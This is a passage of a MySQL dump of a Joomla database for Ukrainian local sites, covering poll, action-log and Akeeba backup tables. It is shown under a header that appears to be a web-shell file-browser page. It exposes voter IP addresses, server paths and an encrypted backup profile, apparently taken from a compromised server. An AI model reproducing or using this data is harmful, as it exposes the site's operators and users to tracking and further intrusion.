????

Your IP : 3.145.7.194


Current Path : /home/filesender/
Upload File :
Current File : //home/filesender/malehus_good-2023-02-17.sql

-- MySQL dump 10.13  Distrib 5.7.38, for FreeBSD13.0 (amd64)
--
-- Host: db23.freehost.com.ua    Database: malehus_good
-- ------------------------------------------------------
-- Server version	5.7.17-log

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `fw3gt_acepolls_options_backup`
--

DROP TABLE IF EXISTS `fw3gt_acepolls_options_backup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_acepolls_options_backup` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `poll_id` int(11) NOT NULL DEFAULT '0',
  `text` text NOT NULL,
  `link` varchar(255) DEFAULT NULL,
  `color` varchar(6) NOT NULL,
  `ordering` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `poll_id` (`poll_id`,`text`(1))
) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_acepolls_options_backup`
--

LOCK TABLES `fw3gt_acepolls_options_backup` WRITE;
/*!40000 ALTER TABLE `fw3gt_acepolls_options_backup` DISABLE KEYS */;
INSERT INTO `fw3gt_acepolls_options_backup` VALUES (1,1,'Підтримкою України цивілізованим світом',NULL,'ff9900',0),(2,1,'Поваленням режиму Януковича',NULL,'0000ff',1),(3,1,'Виборами президента та верховної ради',NULL,'ffff00',2),(4,1,'Героїзмом та стійкістю українського народу',NULL,'ff0000',3),(5,1,'Анексією Криму та війною на сході України',NULL,'ccffff',4);
/*!40000 ALTER TABLE `fw3gt_acepolls_options_backup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_acepolls_polls_backup`
--

DROP TABLE IF EXISTS `fw3gt_acepolls_polls_backup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_acepolls_polls_backup` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime DEFAULT '0000-00-00 00:00:00',
  `params` text NOT NULL,
  `access` int(11) NOT NULL DEFAULT '0',
  `lag` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_acepolls_polls_backup`
--

LOCK TABLES `fw3gt_acepolls_polls_backup` WRITE;
/*!40000 ALTER TABLE `fw3gt_acepolls_polls_backup` DISABLE KEYS */;
INSERT INTO `fw3gt_acepolls_polls_backup` VALUES (1,'Чим Вам запам\'ятався 2014 рік?','chim-vam-zapam-yatavsya-2014-rik',0,'0000-00-00 00:00:00',1,'2014-12-26 20:08:19','2015-09-26 20:08:19','{\"only_registered\":\"0\",\"one_vote_per_user\":\"1\",\"ip_check\":\"0\",\"show_component_msg\":\"1\",\"allow_voting\":\"1\",\"show_what\":\"1\",\"show_hits\":\"1\",\"show_voters\":\"1\",\"show_times\":\"1\",\"show_dropdown\":\"1\",\"show_title\":\"1\",\"opacity\":\"90\",\"bg_color\":\"ffffff\",\"circle_color\":\"505050\",\"pieX\":\"100%\",\"pieY\":\"400\",\"start_angle\":\"55\",\"radius\":\"150\",\"gradient\":\"1\",\"no_labels\":\"0\",\"show_zero_votes\":\"1\",\"animation_type\":\"bounce\",\"bounce_dinstance\":\"30\",\"bg_image\":\"-1\",\"bg_image_x\":\"left\",\"bg_image_y\":\"top\",\"font_size\":\"11\",\"font_color\":\"404040\",\"title_lenght\":\"30\",\"chartX\":\"100%\",\"optionsFontSize\":\"12\",\"barHeight\":\"15\",\"barBorder\":\"1px solid #000000\",\"bgBarColor\":\"f5f5f5\",\"bgBarBorder\":\"1px solid #cccccc\"}',1,1440);
/*!40000 ALTER TABLE `fw3gt_acepolls_polls_backup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_acepolls_votes_backup`
--

DROP TABLE IF EXISTS `fw3gt_acepolls_votes_backup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_acepolls_votes_backup` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `option_id` int(11) NOT NULL DEFAULT '0',
  `poll_id` int(11) NOT NULL DEFAULT '0',
  `ip` int(10) unsigned NOT NULL,
  `user_id` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `poll_id` (`poll_id`)
) ENGINE=MyISAM AUTO_INCREMENT=21 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_acepolls_votes_backup`
--

LOCK TABLES `fw3gt_acepolls_votes_backup` WRITE;
/*!40000 ALTER TABLE `fw3gt_acepolls_votes_backup` DISABLE KEYS */;
INSERT INTO `fw3gt_acepolls_votes_backup` VALUES (1,'2014-12-26 20:25:12',4,1,2992633783,0),(2,'2014-12-29 21:08:21',5,1,3562683999,0),(3,'2014-12-30 15:41:41',4,1,624289523,0),(4,'2015-01-13 19:37:37',2,1,1539617297,0),(5,'2015-01-14 09:25:49',4,1,3584952134,0),(6,'2015-01-21 13:32:20',4,1,1315945066,0),(7,'2015-01-22 09:50:30',5,1,624288942,0),(8,'2015-01-22 09:50:55',5,1,624288942,0),(9,'2015-01-23 04:46:46',2,1,1385291480,0),(10,'2015-06-16 16:16:22',5,1,3585342563,0),(11,'2015-06-24 06:48:22',4,1,3584952098,0),(12,'2015-06-30 19:22:40',5,1,1565197033,0),(13,'2015-07-01 08:56:41',5,1,1433615028,0),(14,'2015-07-11 19:47:39',5,1,622051757,0),(15,'2015-07-13 13:06:21',5,1,1588814604,0),(16,'2015-07-22 06:31:30',5,1,3584952095,0),(17,'2015-07-25 18:59:21',5,1,1565197033,0),(18,'2015-08-20 11:06:04',4,1,2992477194,0),(19,'2015-09-18 12:23:38',5,1,1541471360,0),(20,'2015-09-18 12:24:28',5,1,1541471360,0);
/*!40000 ALTER TABLE `fw3gt_acepolls_votes_backup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_action_log_config`
--

DROP TABLE IF EXISTS `fw3gt_action_log_config`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_action_log_config` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `type_title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `type_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `id_holder` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `title_holder` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `table_name` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `text_prefix` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=20 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_action_log_config`
--

LOCK TABLES `fw3gt_action_log_config` WRITE;
/*!40000 ALTER TABLE `fw3gt_action_log_config` DISABLE KEYS */;
INSERT INTO `fw3gt_action_log_config` VALUES (1,'article','com_content.article','id','title','#__content','PLG_ACTIONLOG_JOOMLA'),(2,'article','com_content.form','id','title','#__content','PLG_ACTIONLOG_JOOMLA'),(3,'banner','com_banners.banner','id','name','#__banners','PLG_ACTIONLOG_JOOMLA'),(4,'user_note','com_users.note','id','subject','#__user_notes','PLG_ACTIONLOG_JOOMLA'),(5,'media','com_media.file','','name','','PLG_ACTIONLOG_JOOMLA'),(6,'category','com_categories.category','id','title','#__categories','PLG_ACTIONLOG_JOOMLA'),(7,'menu','com_menus.menu','id','title','#__menu_types','PLG_ACTIONLOG_JOOMLA'),(8,'menu_item','com_menus.item','id','title','#__menu','PLG_ACTIONLOG_JOOMLA'),(9,'newsfeed','com_newsfeeds.newsfeed','id','name','#__newsfeeds','PLG_ACTIONLOG_JOOMLA'),(10,'link','com_redirect.link','id','old_url','#__redirect_links','PLG_ACTIONLOG_JOOMLA'),(11,'tag','com_tags.tag','id','title','#__tags','PLG_ACTIONLOG_JOOMLA'),(12,'style','com_templates.style','id','title','#__template_styles','PLG_ACTIONLOG_JOOMLA'),(13,'plugin','com_plugins.plugin','extension_id','name','#__extensions','PLG_ACTIONLOG_JOOMLA'),(14,'component_config','com_config.component','extension_id','name','','PLG_ACTIONLOG_JOOMLA'),(15,'contact','com_contact.contact','id','name','#__contact_details','PLG_ACTIONLOG_JOOMLA'),(16,'module','com_modules.module','id','title','#__modules','PLG_ACTIONLOG_JOOMLA'),(17,'access_level','com_users.level','id','title','#__viewlevels','PLG_ACTIONLOG_JOOMLA'),(18,'banner_client','com_banners.client','id','name','#__banner_clients','PLG_ACTIONLOG_JOOMLA'),(19,'application_config','com_config.application','','name','','PLG_ACTIONLOG_JOOMLA');
/*!40000 ALTER TABLE `fw3gt_action_log_config` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_action_logs`
--

DROP TABLE IF EXISTS `fw3gt_action_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_action_logs` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `message_language_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `message` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `log_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `extension` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_id` int(11) NOT NULL DEFAULT '0',
  `item_id` int(11) NOT NULL DEFAULT '0',
  `ip_address` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0.0.0.0',
  PRIMARY KEY (`id`),
  KEY `idx_user_id` (`user_id`),
  KEY `idx_user_id_logdate` (`user_id`,`log_date`),
  KEY `idx_user_id_extension` (`user_id`,`extension`),
  KEY `idx_extension_item_id` (`extension`,`item_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_action_logs`
--

LOCK TABLES `fw3gt_action_logs` WRITE;
/*!40000 ALTER TABLE `fw3gt_action_logs` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_action_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_action_logs_extensions`
--

DROP TABLE IF EXISTS `fw3gt_action_logs_extensions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_action_logs_extensions` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `extension` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=19 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_action_logs_extensions`
--

LOCK TABLES `fw3gt_action_logs_extensions` WRITE;
/*!40000 ALTER TABLE `fw3gt_action_logs_extensions` DISABLE KEYS */;
INSERT INTO `fw3gt_action_logs_extensions` VALUES (1,'com_banners'),(2,'com_cache'),(3,'com_categories'),(4,'com_config'),(5,'com_contact'),(6,'com_content'),(7,'com_installer'),(8,'com_media'),(9,'com_menus'),(10,'com_messages'),(11,'com_modules'),(12,'com_newsfeeds'),(13,'com_plugins'),(14,'com_redirect'),(15,'com_tags'),(16,'com_templates'),(17,'com_users'),(18,'com_checkin');
/*!40000 ALTER TABLE `fw3gt_action_logs_extensions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_action_logs_users`
--

DROP TABLE IF EXISTS `fw3gt_action_logs_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_action_logs_users` (
  `user_id` int(11) unsigned NOT NULL,
  `notify` tinyint(1) unsigned NOT NULL,
  `extensions` text COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`user_id`),
  KEY `idx_notify` (`notify`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_action_logs_users`
--

LOCK TABLES `fw3gt_action_logs_users` WRITE;
/*!40000 ALTER TABLE `fw3gt_action_logs_users` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_action_logs_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_ak_profiles`
--

DROP TABLE IF EXISTS `fw3gt_ak_profiles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_ak_profiles` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `configuration` longtext COLLATE utf8mb4_unicode_ci,
  `filters` longtext COLLATE utf8mb4_unicode_ci,
  `quickicon` tinyint(3) NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_ak_profiles`
--

LOCK TABLES `fw3gt_ak_profiles` WRITE;
/*!40000 ALTER TABLE `fw3gt_ak_profiles` DISABLE KEYS */;
INSERT INTO `fw3gt_ak_profiles` VALUES (1,'Default Backup Profile','###AES128###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','',1);
/*!40000 ALTER TABLE `fw3gt_ak_profiles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_ak_stats`
--

DROP TABLE IF EXISTS `fw3gt_ak_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_ak_stats` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment` longtext COLLATE utf8mb4_unicode_ci,
  `backupstart` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  `backupend` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  `status` enum('run','fail','complete') COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'run',
  `origin` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'backend',
  `type` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'full',
  `profile_id` bigint(20) NOT NULL DEFAULT '1',
  `archivename` longtext COLLATE utf8mb4_unicode_ci,
  `absolute_path` longtext COLLATE utf8mb4_unicode_ci,
  `multipart` int(11) NOT NULL DEFAULT '0',
  `tag` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `backupid` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `filesexist` tinyint(3) NOT NULL DEFAULT '1',
  `remote_filename` varchar(1000) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `total_size` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `idx_fullstatus` (`filesexist`,`status`),
  KEY `idx_stale` (`status`,`origin`)
) ENGINE=InnoDB AUTO_INCREMENT=60 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_ak_stats`
--

LOCK TABLES `fw3gt_ak_stats` WRITE;
/*!40000 ALTER TABLE `fw3gt_ak_stats` DISABLE KEYS */;
INSERT INTO `fw3gt_ak_stats` VALUES (57,'Backup taken on 26.08.2020 15:12','','2020-08-26 12:12:32','2020-08-26 12:52:38','complete','backend','full',1,'site-malyn-rayrada.gov.ua-20200826-181232.jpa','/sata2/home/users/malynrayr/www/www.malyn-rayrada.gov.ua/administrator/components/com_akeeba/backup/site-malyn-rayrada.gov.ua-20200826-181232.jpa',1,'backend','id54',0,NULL,407567223),(58,'Backup taken on 26.08.2020 15:59','','2020-08-26 13:00:16','0000-00-00 00:00:00','complete','backend','full',1,'site-malyn-rayrada.gov.ua-20200826-190016.jpa','/sata2/home/users/malynrayr/www/www.malyn-rayrada.gov.ua/administrator/components/com_akeeba/backup/site-malyn-rayrada.gov.ua-20200826-190016.jpa',0,'backend','id58',0,NULL,0),(59,'Backup taken on 29.08.2020 11:54','','2020-08-29 08:54:53','0000-00-00 00:00:00','complete','backend','full',1,'site-r.malehus.in.ua-20200829-145453.jpa','/sata2/home/users/malehus/www/r.malehus.in.ua/administrator/components/com_akeeba/backup/site-r.malehus.in.ua-20200829-145453.jpa',0,'backend','id59',0,NULL,0);
/*!40000 ALTER TABLE `fw3gt_ak_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_ak_storage`
--

DROP TABLE IF EXISTS `fw3gt_ak_storage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_ak_storage` (
  `tag` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `lastupdate` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `data` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`tag`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_ak_storage`
--

LOCK TABLES `fw3gt_ak_storage` WRITE;
/*!40000 ALTER TABLE `fw3gt_ak_storage` DISABLE KEYS */;
INSERT INTO `fw3gt_ak_storage` VALUES ('akeebaupdatecheck_lastrun','2023-02-16 14:51:09',NULL);
/*!40000 ALTER TABLE `fw3gt_ak_storage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_akeeba_common`
--

DROP TABLE IF EXISTS `fw3gt_akeeba_common`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_akeeba_common` (
  `key` varchar(190) CHARACTER SET utf8 COLLATE utf8_unicode_ci NOT NULL,
  `value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_akeeba_common`
--

LOCK TABLES `fw3gt_akeeba_common` WRITE;
/*!40000 ALTER TABLE `fw3gt_akeeba_common` DISABLE KEYS */;
INSERT INTO `fw3gt_akeeba_common` VALUES ('file_fef','[\"com_akeeba\"]'),('fof30','[\"com_akeeba\"]'),('stats_lastrun','1598702079'),('stats_siteid','d5047a1461e2ff7e0f7ac0b4430e0878155d9659'),('stats_siteurl','736a133f288c597eb5d47723ad39a1af');
/*!40000 ALTER TABLE `fw3gt_akeeba_common` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_assets`
--

DROP TABLE IF EXISTS `fw3gt_assets`;
